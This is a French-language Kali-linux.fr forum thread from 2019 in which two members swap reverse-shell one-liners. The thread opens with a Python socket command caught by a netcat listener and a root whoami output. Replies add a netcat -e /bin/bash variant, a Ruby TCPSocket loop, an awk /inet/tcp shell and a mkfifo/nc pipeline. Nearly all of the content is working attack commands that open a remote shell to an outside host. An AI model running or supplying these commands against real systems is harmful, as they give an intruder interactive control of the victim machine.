Auteur Sujet: Reverse shell python - Linux  (Lu 1474 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 602
  • +34/-5
Reverse shell python - Linux
« le: 25 octobre 2019 à 16:57:21 »
Pour ceux qui aiment bien les socket, python, les file descriptor et les reverse-shell,
Une ligne de commande python bien pratique pour obtenir un reverse shell linux:
On lance d'abord netcat dans une console :
root@kali:/home# nc -lvp 666
listening on [any] 666 ...
Oui j'aime bien le port 666, mon coté satananiste
Puis cette commande python dans la console de l'ordi cible :
root@kali:/# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.177.0.22",666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Et hop !
connect to [10.177.0.22] from kali [192.168.0.25] 52364
# whoami
root
# exit


Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Reverse shell python - Linux
« Réponse #1 le: 25 octobre 2019 à 17:20:20 »
Je trouve que il y a plus efficace en one line que en python mais merci du partage ;)

Mess  with the bests.
Die like the rest.

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 602
  • +34/-5
Re : Reverse shell python - Linux
« Réponse #2 le: 25 octobre 2019 à 17:31:59 »
yeap un simple netcat des 2 cotés suffit,  genre :
console 1:
root@kali:/# nc -lvp 666
listening on [any] 666 ...
Console 2 :
nc 10.177.0.22 666 -e/bin/bashet :
connect to [10.177.0.22] from kali [192.168.0.25] 35560Mais c'est pas drole.
Avec la commande python j'espere que ceux qui ne sont pas familier de la librairie socket et des file descriptor creuseront un peu...  ;D

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Reverse shell python - Linux
« Réponse #3 le: 25 octobre 2019 à 17:38:11 »
je pensais plus à awk ou perl ;)
Mess  with the bests.
Die like the rest.

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 602
  • +34/-5
Re : Reverse shell python - Linux
« Réponse #4 le: 25 octobre 2019 à 17:50:46 »
juste pour t'embeter, en ruby  ;)
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.25","666");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Mais comme je t'aime bien une version awk alambiquée avec un shell custo :) :
awk 'BEGIN {s = "/inet/tcp/0/192.168.0.25/666"; while(42) { do{ printf "le joli shell awk pour zero >" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2607
  • +142/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Reverse shell python - Linux
« Réponse #5 le: 25 octobre 2019 à 17:52:00 »
Ce magnifique clin d’œil ;) merci :P

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc <IP> <PORT> > f
« Modifié: 25 octobre 2019 à 18:05:49 par ZeR0-@bSoLu »
Mess  with the bests.
Die like the rest.